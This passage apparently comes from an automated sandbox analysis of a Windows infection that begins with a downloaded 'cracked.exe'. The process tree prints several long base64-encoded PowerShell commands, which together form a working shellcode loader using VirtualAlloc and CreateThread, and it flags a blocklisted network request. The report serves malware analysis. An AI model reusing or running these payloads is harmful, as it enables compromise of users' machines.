AFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsACIAOwBpAGUAeAAgACIAJgAgACQAcQBiAFgAIAAkAFYAVQBiAG0AIAAkAGUAIgB9AGUAbABzAGUAewA7AGkAZQB4ACAAIgAmACAAcABvAHcAZQByAHMAaABlAGwAbAAgACQAVgBVAGIAbQAgACQAZQAiADsAfQA='"
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4992

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ec JABaAGoATwBJACAAPQAgACcAJABvAHoAVAAgAD0AIAAnACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG0AcwB2AGMAcgB0AC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABtAGUAbQBzAGUAdAAoAEkAbgB0AFAAdAByACAAZABlAHMAdAAsACAAdQBpAG4AdAAgAHMAcgBjACwAIAB1AGkAbgB0ACAAYwBvAHUAbgB0ACkAOwAnACcAOwAkAHcAIAA9ACAAQQBkAGQALQBUAHkAcABlACAALQBtAGUAbQBiAGUAcgBEAGUAZgBpAG4AaQB0AGkAbwBuACAAJABvAHoAVAAgAC0ATgBhAG0AZQAgACIAVwBpAG4AMwAyACIAIAAtAG4AYQBtAGUAcwBwAGEAYwBlACAAVwBpAG4AMwAyAEYAdQBuAGMAdABpAG8AbgBzACAALQBwAGEAcwBzAHQAaAByAHUAOwBbAEIAeQB0AGUAWwBdAF0AOwBbAEIAeQB0AGUAWwBdAF0AJAB6ACAAPQAgADAAeABiAGYALAAwAHgAZQBmACwAMAB4ADgAMwAsADAAeAA2ADMALAAwAHgANwA0ACwAMAB4AGQAZAAsADAAeABjADIALAAwAHgAZAA5ACwAMAB4ADcANAAsADAAeAAyADQALAAwAHgAZgA0ACwAMAB4ADUAOAAsADAAeAAzADEALAAwAHgAYwA5ACwAMAB4AGIAMQAsADAAeAA0AGIALAAwAHgAOAAzACwAMAB4AGMAMAAsADAAeAAwADQALAAwAHgAMwAxACwAMAB4ADcAOAAsADAAeAAwAGUALAAwAHgAMAAzACwAMAB4ADkANwAsADAAeAA4AGQALAAwAHgAOAAxACwAMAB4ADgAMQAsADAAeAA5AGIALAAwAHgANwBhACwAMAB4AGMAYQAsADAAeAA2AGEALAAwAHgANgAzACwAMAB4ADcAYgAsADAAeABiADUALAAwAHgAZQAzACwAMAB4ADgANgAsADAAeAA0AGEALAAwAHgAZQA3ACwAMAB4ADkAMAAsADAAeABjADMALAAwAHgAZgBmACwAMAB4ADMANwAsADAAeABkADIALAAwAHgAOAAxACwAMAB4AGYAMwAsADAAeABiAGMALAAwAHgAYgA2ACwAMAB4ADMAMQAsADAAeAAzAGQALAAwAHgAMwBjACwAMAB4ADMAOQAsADAAeAA4AGUALAAwAHgANwA3ACwAMAB4AGUANAAsADAAeABjAGQALAAwAHgAOAAyACwAMAB4AGEAZgAsADAAeABkADkALAAwAHgAMQAxACwAMAB4AGMAZQAsADAAeAA4AGMALAAwAHgANwA4ACwAMAB4AGUAZQAsADAAeAAwAGMALAAwAHgAYwAxACwAMAB4ADUAYQAsADAAeABjAGYALAAwAHgAZABmACwAMAB4ADEANAAsADAAeAA5AGEALAAwAHgAMAA4ACwAMAB4ADkANgAsADAAeAA1ADMALAAwAHgANwAzACwAMAB4AGMANAAsADAAeAA3AGYALAAwAHgAMQA3ACwAMAB4AGQAOQAsADAAeABmADkALAAwAHgAZgA0ACwAMAB4ADYANQAsADAAeABlADIALAAwAHgAZgA4ACwAMAB4AGQAYQAsADAAeABlADEALAAwAHgANQBhACwAMAB4ADgAMwAsADAAeAA1AGYALAAwAHgAMwA1ACwAMAB4ADIAZQAsADAAeAAzAGYALAAwAHgANQBlACwAMAB4ADYANgAsADAAeAA0ADQALAAwAHgAZQA3ACwAMAB4ADQAMAAsADAAeAAwAGQALAAwAHgAMQAzACwAMAB4ADAAMAAsADAAeABkADAALAAwAHgAMQAwACwAMAB4ADcANwAsADAAeABiADUALAAwAHgAMQA5ACwAMAB4ADYANgAsADAAeAA0AGIALAAwAHgAZgBmACwAMAB4ADEAMgAsADAAeABiADMALAAwAHgAMwA4ACwAMAB4AGYAZQAsADAAeABmADIALAAwAHgAOABkACwAMAB4AGMAMQAsADAAeAAzADAALAAwAHgAMwBhACwAMAB4ADIAYwAsADAAeABmADIALAAwAHgAMwBlACwAMAB4ADEANgAsADAAeABhAGUALAAwAHgAYwBhACwAMAB4ADcAOQAsADAAeAA4ADYALAAwAHgAYwA0ACwAMAB4ADIAMAAsADAAeAA3AGEALAAwAHgAMwBiACwAMAB4AGQAZgAsADAAeABmADIALAAwAHgAMAAwACwAMAB4AGUANwAsADAAeAA2AGEALAAwAHgAZQA1ACwAMAB4AGEAMwAsADAAeAA2AGMALAAwAHgAYwBjACwAMAB4AGMAMQAsADAAeAA1ADIALAAwAHgAYQAxACwAMAB4ADgAYgAsADAAeAA4ADIALAAwAHgANQA5ACwAMAB4ADAAZQAsADAAeABkAGYALAAwAHgAYwBkACwAMAB4ADcAZAAsADAAeAA5ADEALAAwAHgAMABjACwAMAB4ADYANgAsADAAeAA3ADkALAAwAHgAMQBhACwAMAB4AGIAMwAsADAAeABhADkALAAwAHgAMABiACwAMAB4ADUAOAAsADAAeAA5ADAALAAwAHgANgBkACwAMAB4ADUANwAsADAAeAAzAGIALAAwAHgAYgA5ACwAMAB4ADMANAAsADAAeAAzAGQALAAwAHgAZQBhACwAMAB4AGMANgAsADAAeAAyADcALAAwAHgAOQA5ACwAMAB4ADUAMwAsADAAeAA2ADMALAAwAHgAMgAzACwAMAB4ADAAOAAsADAAeAA4ADIALAAwAHgAMQAzACwAMAB4AGMAYwAsADAAeABkADIALAAwAHgAYQBiACwAMAB4ADQAOQAsADAAeAA1AGIALAAwAHgAMQBlACwAMAB4ADYAMQAsADAAeAA3ADIALAAwAHgAOQBiACwAMAB4ADAAOAAsADAAeABmADIALAAwAHgAMAAxACwAMAB4AGEAOQAsADAAeAA5ADcALAAwAHgAYQA4ACwAMAB4ADgAZAAsADAAeAA4ADEALAAwAHgANQAwACwAMAB4ADcANgAsADAAeAA0ADkALAAwAHgAOQAzACwAMAB4ADcANwAsADAAeAA4ADkALAAwAHgAOAA1ACwAMAB4ADEAYgAsADAAeAAxADcALAAwAHgANwA0ACwAMAB4ADIANgAsADAAeAA1AGMALAAwAHgAMwAxACwAMAB4AGIAMgAsADAAeAA3ADIALAAwAHgAMABjACwAMAB4ADIAOQAsADAAeAAxADMALAAwAHgAZgBiACwAMAB4AGMANwAsADAAeABhADkALAAwAHgAOQBjACwAMAB4ADIAZQAsADAAeAA3AGQALAAwAHgAYQAwACwAMAB4ADAAYQAsADAAeAA0ADIALAAwAHgAMwBiACwAMAB4ADYAOQAsADAAeABkADkALAAwAHgAMABjACwAMAB4ADMAZQAsADAAeAA5ADIALAAwAHgANgA2ACwAMAB4ADIAYgAsADAAeABiADcALAAwAHgANwA0ACwAMAB4AGMAOAAsADAAeABlADQALAAwAHgAOQA4ACwAMAB4ADIAOAAsADAAeABhADgALAAwAHgANQA0ACwAMAB4ADUAOQAsADAAeAA5ADkALAAwAHgANAAwACwAMAB4AGIAZgAsADAAeAA1ADYALAAwAHgAYwA2ACwAMAB4ADcAMAAsADAAeABjADAALAAwAHgAYgBjACwAMAB4ADYAZgAsADAAeAAxAGEALAAwAHgAMgBmACwAMAB4ADYAOQAsADAAeABjADcALAAwAHgAYgAyACwAMAB4AGQANgAsADAAeAAzADAALAAwAHgAOQAzACwAMAB4ADIAMwAsADAAeAAxADYALAAwAHgAZQBmACwAMAB4AGQAOQAsADAAeAA2ADMALAAwAHgAOQBjACwAMAB4ADEAYwAsADAAeAAxAGQALAAwAHgAMgBkACwAMAB4ADUANQAsADAAeAA2ADgALAAwAHgAMABkACwAMAB4AGQAOQAsADAAeAA5ADUALAAwAHgAMgA3ACwAMAB4ADYAZgAsADAAeAA0AGYALAAwAHgAYQA5ACwAMAB4ADkAZAAsADAAeAAxAGEALAAwAHgANgBmACwAMAB4ADMAZgAsADAAeAAxAGEALAAwAHgAOABkACwAMAB4ADMAOAAsADAAeABkADcALAAwAHgAMgAwACwAMAB4AGUAOAAsADAAeAAwAGUALAAwAHgANwA4ACwAMAB4AGQAYQAsADAAeABkAGYALAAwAHgAMAA1ACwAMAB4AGIAMQAsADAAeAA0AGUALAAwAHgAYQAwACwAMAB4ADcAMQAsADAAeABiAGUALAAwAHgAOQBlACwAMAB4ADIAMAAsADAAeAA4ADEALAAwAHgAZQA4ACwAMAB4AGYANAAsADAAeAAyADAALAAwAHgAZQA5ACwAMAB4ADQAYwAsADAAeABhAGQALAAwAHgANwAyACwAMAB4ADAAYwAsADAAeAA5ADMALAAwAHgANwA4ACwAMAB4AGUANwAsADAAeAA5AGQALAAwAHgAMAA2ACwAMAB4ADgAMwAsADAAeAA1AGUALAAwAHgANwAyACwAMAB4ADgAMAAsADAAeABlAGIALAAwAHgANQBjACwAMAB4AGEAZAAsADAAeABlADYALAAwAHgAYgAzACwAMAB4ADkAZgAsADAAeAA5ADgALAAwAHgAZgA2ACwAMAB4ADgAOAAsADAAeAA0ADkALAAwAHgAZQA0ACwAMAB4ADgAYwAsADAAeABlADAALAAwAHgANAA5ADsAJABnACAAPQAgADAAeAAxADAAMAAwADsAaQBmACAAKAAkAHoALgBMAGUAbgBnAHQAaAAgAC0AZwB0ACAAMAB4ADEAMAAwADAAKQB7ACQAZwAgAD0AIAAkAHoALgBMAGUAbgBnAHQAaAB9ADsAJABTAGUAbwA9ACQAdwA6ADoAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKAAwACwAMAB4ADEAMAAwADAALAAkAGcALAAwAHgANAAwACkAOwBmAG8AcgAgACgAJABpAD0AMAA7ACQAaQAgAC0AbABlACAAKAAkAHoALgBMAGUAbgBnAHQAaAAtADEAKQA7ACQAaQArACsAKQAgAHsAJAB3ADoAOgBtAGUAbQBzAGUAdAAoAFsASQBuAHQAUAB0AHIAXQAoACQAUwBlAG8ALgBUAG8ASQBuAHQAMwAyACgAKQArACQAaQApACwAIAAkAHoAWwAkAGkAXQAsACAAMQApAH0AOwAkAHcAOgA6AEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgAMAAsADAALAAkAFMAZQBvACwAMAAsADAALAAwACkAOwBmAG8AcgAgACgAOwA7ACkAewBTAHQAYQByAHQALQBzAGwAZQBlAHAAIAA2ADAAfQA7ACcAOwAkAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoAVABvAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBuAGkAYwBvAGQAZQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAWgBqAE8ASQApACkAOwAkAFYAVQBiAG0AIAA9ACAAIgAtAGUAYwAgACIAOwBpAGYAKABbAEkAbgB0AFAAdAByAF0AOgA6AFMAaQB6AGUAIAAtAGUAcQAgADgAKQB7ACQAcQBiAFgAIAA9ACAAJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAIAArACAAIgBcAHMAeQBzAHcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsACIAOwBpAGUAeAAgACIAJgAgACQAcQBiAFgAIAAkAFYAVQBiAG0AIAAkAGUAIgB9AGUAbABzAGUAewA7AGkAZQB4ACAAIgAmACAAcABvAHcAZQByAHMAaABlAGwAbAAgACQAVgBVAGIAbQAgACQAZQAiADsAfQA=
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2308

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" -ec JABvAHoAVAAgAD0AIAAnAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKABJAG4AdABQAHQAcgAgAGwAcABBAGQAZAByAGUAcwBzACwAIAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAAgAHUAaQBuAHQAIABmAGwAQQBsAGwAbwBjAGEAdABpAG8AbgBUAHkAcABlACwAIAB1AGkAbgB0ACAAZgBsAFAAcgBvAHQAZQBjAHQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABBAHQAdAByAGkAYgB1AHQAZQBzACwAIAB1AGkAbgB0ACAAZAB3AFMAdABhAGMAawBTAGkAegBlACwAIABJAG4AdABQAHQAcgAgAGwAcABTAHQAYQByAHQAQQBkAGQAcgBlAHMAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAUABhAHIAYQBtAGUAdABlAHIALAAgAHUAaQBuAHQAIABkAHcAQwByAGUAYQB0AGkAbwBuAEYAbABhAGcAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQASQBkACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBtAHMAdgBjAHIAdAAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAbQBlAG0AcwBlAHQAKABJAG4AdABQAHQAcgAgAGQAZQBzAHQALAAgAHUAaQBuAHQAIABzAHIAYwAsACAAdQBpAG4AdAAgAGMAbwB1AG4AdAApADsAJwA7ACQAdwAgAD0AIABBAGQAZAAtAFQAeQBwAGUAIAAtAG0AZQBtAGIAZQByAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAG8AegBUACAALQBOAGEAbQBlACAAIgBXAGkAbgAzADIAIgAgAC0AbgBhAG0AZQBzAHAAYQBjAGUAIABXAGkAbgAzADIARgB1AG4AYwB0AGkAbwBuAHMAIAAtAHAAYQBzAHMAdABoAHIAdQA7AFsAQgB5AHQAZQBbAF0AXQA7AFsAQgB5AHQAZQBbAF0AXQAkAHoAIAA9ACAAMAB4AGIAZgAsADAAeABlAGYALAAwAHgAOAAzACwAMAB4ADYAMwAsADAAeAA3ADQALAAwAHgAZABkACwAMAB4AGMAMgAsADAAeABkADkALAAwAHgANwA0ACwAMAB4ADIANAAsADAAeABmADQALAAwAHgANQA4ACwAMAB4ADMAMQAsADAAeABjADkALAAwAHgAYgAxACwAMAB4ADQAYgAsADAAeAA4ADMALAAwAHgAYwAwACwAMAB4ADAANAAsADAAeAAzADEALAAwAHgANwA4ACwAMAB4ADAAZQAsADAAeAAwADMALAAwAHgAOQA3ACwAMAB4ADgAZAAsADAAeAA4ADEALAAwAHgAOAAxACwAMAB4ADkAYgAsADAAeAA3AGEALAAwAHgAYwBhACwAMAB4ADYAYQAsADAAeAA2ADMALAAwAHgANwBiACwAMAB4AGIANQAsADAAeABlADMALAAwAHgAOAA2ACwAMAB4ADQAYQAsADAAeABlADcALAAwAHgAOQAwACwAMAB4AGMAMwAsADAAeABmAGYALAAwAHgAMwA3ACwAMAB4AGQAMgAsADAAeAA4ADEALAAwAHgAZgAzACwAMAB4AGIAYwAsADAAeABiADYALAAwAHgAMwAxACwAMAB4ADMAZAAsADAAeAAzAGMALAAwAHgAMwA5ACwAMAB4ADgAZQAsADAAeAA3ADcALAAwAHgAZQA0ACwAMAB4AGMAZAAsADAAeAA4ADIALAAwAHgAYQBmACwAMAB4AGQAOQAsADAAeAAxADEALAAwAHgAYwBlACwAMAB4ADgAYwAsADAAeAA3ADgALAAwAHgAZQBlACwAMAB4ADAAYwAsADAAeABjADEALAAwAHgANQBhACwAMAB4AGMAZgAsADAAeABkAGYALAAwAHgAMQA0ACwAMAB4ADkAYQAsADAAeAAwADgALAAwAHgAOQA2ACwAMAB4ADUAMwAsADAAeAA3ADMALAAwAHgAYwA0ACwAMAB4ADcAZgAsADAAeAAxADcALAAwAHgAZAA5ACwAMAB4AGYAOQAsADAAeABmADQALAAwAHgANgA1ACwAMAB4AGUAMgAsADAAeABmADgALAAwAHgAZABhACwAMAB4AGUAMQAsADAAeAA1AGEALAAwAHgAOAAzACwAMAB4ADUAZgAsADAAeAAzADUALAAwAHgAMgBlACwAMAB4ADMAZgAsADAAeAA1AGUALAAwAHgANgA2ACwAMAB4ADQANAAsADAAeABlADcALAAwAHgANAAwACwAMAB4ADAAZAAsADAAeAAxADMALAAwAHgAMAAwACwAMAB4AGQAMAAsADAAeAAxADAALAAwAHgANwA3ACwAMAB4AGIANQAsADAAeAAxADkALAAwAHgANgA2ACwAMAB4ADQAYgAsADAAeABmAGYALAAwAHgAMQAyACwAMAB4AGIAMwAsADAAeAAzADgALAAwAHgAZgBlACwAMAB4AGYAMgAsADAAeAA4AGQALAAwAHgAYwAxACwAMAB4ADMAMAAsADAAeAAzAGEALAAwAHgAMgBjACwAMAB4AGYAMgAsADAAeAAzAGUALAAwAHgAMQA2ACwAMAB4AGEAZQAsADAAeABjAGEALAAwAHgANwA5ACwAMAB4ADgANgAsADAAeABjADQALAAwAHgAMgAwACwAMAB4ADcAYQAsADAAeAAzAGIALAAwAHgAZABmACwAMAB4AGYAMgAsADAAeAAwADAALAAwAHgAZQA3ACwAMAB4ADYAYQAsADAAeABlADUALAAwAHgAYQAzACwAMAB4ADYAYwAsADAAeABjAGMALAAwAHgAYwAxACwAMAB4ADUAMgAsADAAeABhADEALAAwAHgAOABiACwAMAB4ADgAMgAsADAAeAA1ADkALAAwAHgAMABlACwAMAB4AGQAZgAsADAAeABjAGQALAAwAHgANwBkACwAMAB4ADkAMQAsADAAeAAwAGMALAAwAHgANgA2ACwAMAB4ADcAOQAsADAAeAAxAGEALAAwAHgAYgAzACwAMAB4AGEAOQAsADAAeAAwAGIALAAwAHgANQA4ACwAMAB4ADkAMAAsADAAeAA2AGQALAAwAHgANQA3ACwAMAB4ADMAYgAsADAAeABiADkALAAwAHgAMwA0ACwAMAB4ADMAZAAsADAAeABlAGEALAAwAHgAYwA2ACwAMAB4ADIANwAsADAAeAA5ADkALAAwAHgANQAzACwAMAB4ADYAMwAsADAAeAAyADMALAAwAHgAMAA4ACwAMAB4ADgAMgAsADAAeAAxADMALAAwAHgAYwBjACwAMAB4AGQAMgAsADAAeABhAGIALAAwAHgANAA5ACwAMAB4ADUAYgAsADAAeAAxAGUALAAwAHgANgAxACwAMAB4ADcAMgAsADAAeAA5AGIALAAwAHgAMAA4ACwAMAB4AGYAMgAsADAAeAAwADEALAAwAHgAYQA5ACwAMAB4ADkANwAsADAAeABhADgALAAwAHgAOABkACwAMAB4ADgAMQAsADAAeAA1ADAALAAwAHgANwA2ACwAMAB4ADQAOQAsADAAeAA5ADMALAAwAHgANwA3ACwAMAB4ADgAOQAsADAAeAA4ADUALAAwAHgAMQBiACwAMAB4ADEANwAsADAAeAA3ADQALAAwAHgAMgA2ACwAMAB4ADUAYwAsADAAeAAzADEALAAwAHgAYgAyACwAMAB4ADcAMgAsADAAeAAwAGMALAAwAHgAMgA5ACwAMAB4ADEAMwAsADAAeABmAGIALAAwAHgAYwA3ACwAMAB4AGEAOQAsADAAeAA5AGMALAAwAHgAMgBlACwAMAB4ADcAZAAsADAAeABhADAALAAwAHgAMABhACwAMAB4ADQAMgAsADAAeAAzAGIALAAwAHgANgA5ACwAMAB4AGQAOQAsADAAeAAwAGMALAAwAHgAMwBlACwAMAB4ADkAMgAsADAAeAA2ADYALAAwAHgAMgBiACwAMAB4AGIANwAsADAAeAA3ADQALAAwAHgAYwA4ACwAMAB4AGUANAAsADAAeAA5ADgALAAwAHgAMgA4ACwAMAB4AGEAOAAsADAAeAA1ADQALAAwAHgANQA5ACwAMAB4ADkAOQAsADAAeAA0ADAALAAwAHgAYgBmACwAMAB4ADUANgAsADAAeABjADYALAAwAHgANwAwACwAMAB4AGMAMAAsADAAeABiAGMALAAwAHgANgBmACwAMAB4ADEAYQAsADAAeAAyAGYALAAwAHgANgA5ACwAMAB4AGMANwAsADAAeABiADIALAAwAHgAZAA2ACwAMAB4ADMAMAAsADAAeAA5ADMALAAwAHgAMgAzACwAMAB4ADEANgAsADAAeABlAGYALAAwAHgAZAA5ACwAMAB4ADYAMwAsADAAeAA5AGMALAAwAHgAMQBjACwAMAB4ADEAZAAsADAAeAAyAGQALAAwAHgANQA1ACwAMAB4ADYAOAAsADAAeAAwAGQALAAwAHgAZAA5ACwAMAB4ADkANQAsADAAeAAyADcALAAwAHgANgBmACwAMAB4ADQAZgAsADAAeABhADkALAAwAHgAOQBkACwAMAB4ADEAYQAsADAAeAA2AGYALAAwAHgAMwBmACwAMAB4ADEAYQAsADAAeAA4AGQALAAwAHgAMwA4ACwAMAB4AGQANwAsADAAeAAyADAALAAwAHgAZQA4ACwAMAB4ADAAZQAsADAAeAA3ADgALAAwAHgAZABhACwAMAB4AGQAZgAsADAAeAAwADUALAAwAHgAYgAxACwAMAB4ADQAZQAsADAAeABhADAALAAwAHgANwAxACwAMAB4AGIAZQAsADAAeAA5AGUALAAwAHgAMgAwACwAMAB4ADgAMQAsADAAeABlADgALAAwAHgAZgA0ACwAMAB4ADIAMAAsADAAeABlADkALAAwAHgANABjACwAMAB4AGEAZAAsADAAeAA3ADIALAAwAHgAMABjACwAMAB4ADkAMwAsADAAeAA3ADgALAAwAHgAZQA3ACwAMAB4ADkAZAAsADAAeAAwADYALAAwAHgAOAAzACwAMAB4ADUAZQAsADAAeAA3ADIALAAwAHgAOAAwACwAMAB4AGUAYgAsADAAeAA1AGMALAAwAHgAYQBkACwAMAB4AGUANgAsADAAeABiADMALAAwAHgAOQBmACwAMAB4ADkAOAAsADAAeABmADYALAAwAHgAOAA4ACwAMAB4ADQAOQAsADAAeABlADQALAAwAHgAOABjACwAMAB4AGUAMAAsADAAeAA0ADkAOwAkAGcAIAA9ACAAMAB4ADEAMAAwADAAOwBpAGYAIAAoACQAegAuAEwAZQBuAGcAdABoACAALQBnAHQAIAAwAHgAMQAwADAAMAApAHsAJABnACAAPQAgACQAegAuAEwAZQBuAGcAdABoAH0AOwAkAFMAZQBvAD0AJAB3ADoAOgBWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoADAALAAwAHgAMQAwADAAMAAsACQAZwAsADAAeAA0ADAAKQA7AGYAbwByACAAKAAkAGkAPQAwADsAJABpACAALQBsAGUAIAAoACQAegAuAEwAZQBuAGcAdABoAC0AMQApADsAJABpACsAKwApACAAewAkAHcAOgA6AG0AZQBtAHMAZQB0ACgAWwBJAG4AdABQAHQAcgBdACgAJABTAGUAbwAuAFQAbwBJAG4AdAAzADIAKAApACsAJABpACkALAAgACQAegBbACQAaQBdACwAIAAxACkAfQA7ACQAdwA6ADoAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKAAwACwAMAAsACQAUwBlAG8ALAAwACwAMAAsADAAKQA7AGYAbwByACAAKAA7ADsAKQB7AFMAdABhAHIAdAAtAHMAbABlAGUAcAAgADYAMAB9ADsA
5⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4384

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\fvhnaifq\fvhnaifq.cmdline"
6⤵
PID:4720

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5D33.tmp" "c:\Users\Admin\AppData\Local\Temp\fvhnaifq\CSC5DEB56F6345403FAFDEB3922BFD11C2.TMP"
7⤵
PID:1160

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1860 --field-trial-handle=1920,i,12437635843639052516,16025474688126076809,131072 /prefetch:2
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:3176

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5180 --field-trial-handle=1920,i,12437635843639052516,16025474688126076809,131072 /prefetch:8
2⤵
PID:1236

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4656 --field-trial-handle=1920,i,12437635843639052516,16025474688126076809,131072 /prefetch:8
2⤵
PID:5640

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4860 --field-trial-handle=1920,i,12437635843639052516,16025474688126076809,131072 /prefetch:8
2⤵
PID:4720

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5100 --field-trial-handle=1920,i,12437635843639052516,16025474688126076809,131072 /prefetch:8
2⤵
PID:4208

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5236 --field-trial-handle=1920,i,12437635843639052516,16025474688126076809,131072 /prefetch:8
2⤵
PID:2324

C:\Users\Admin\Downloads\cracked.exe
"C:\Users\Admin\Downloads\cracked.exe"
2⤵
- Executes dropped EXE
PID:856

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5580 --field-trial-handle=1920,i,12437635843639052516,16025474688126076809,131072 /prefetch:8
2⤵
PID:4024

C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
1⤵
PID:8

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:5588

C:\Windows\system32\cmd.exe
